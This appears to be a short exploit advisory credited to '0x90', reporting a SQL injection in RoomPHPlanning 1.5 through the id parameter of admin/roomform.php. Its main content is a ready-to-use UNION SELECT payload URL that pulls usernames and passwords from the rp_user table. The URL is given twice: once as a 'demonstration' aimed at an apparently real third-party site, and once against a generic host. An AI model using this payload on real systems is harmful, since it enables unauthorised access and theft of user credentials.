_____          ____   _____    ____   _____   __  __    _____   ____
   /  _  \ /\  /\ / _  \ /  _  \  / ___| /  _  \ /  \/  \  /  _  \ / _  |
   | | | | \ \/ / ||_| | | | | |  | |    | | | | | \__/ |  | |_| | ||_|_|
   | | | |  \  /  \__  | | | | |  | |    | | | | | |  | |  |  _  | |   \
   | |_| |  /  \   __| | | |_| |/\| |__  | |_| | | |  | |/\| | | | | |\ \
   \_____/ / /\ \ |____/ \_____/\/\____| \_____/ |_|  |_|\/|_| |_| |_| \_|
           \/  \/

[~] RoomPHPlanning 1.5 (roomform.php id) Remote SQL Injection

[~] Author: 0x90

[~] HomePage: www.0x90.com.ar

[~] Contact: Guns[at]0x90[dot]com[dot]ar

[~] Script: RoomPHPlanning

[~] site: http://www.beaussier.com/

[~] Vulnerability Class: SQL Injection

[~] Online Demostration: http://www.hsbcorp.co.cc/hc/admin/roomform.php?id=-0x90+union+select+concat(LoginUs,0x3a,char(58),PwdUs),0x90,0x90,0x90,0x90,0x90+from+rp_user



[~] Exploit:

http://host/admin/roomform.php?id=-0x90+union+select+concat(LoginUs,0x3a,char(58),PwdUs),0x90,0x90,0x90,0x90,0x90+from+rp_user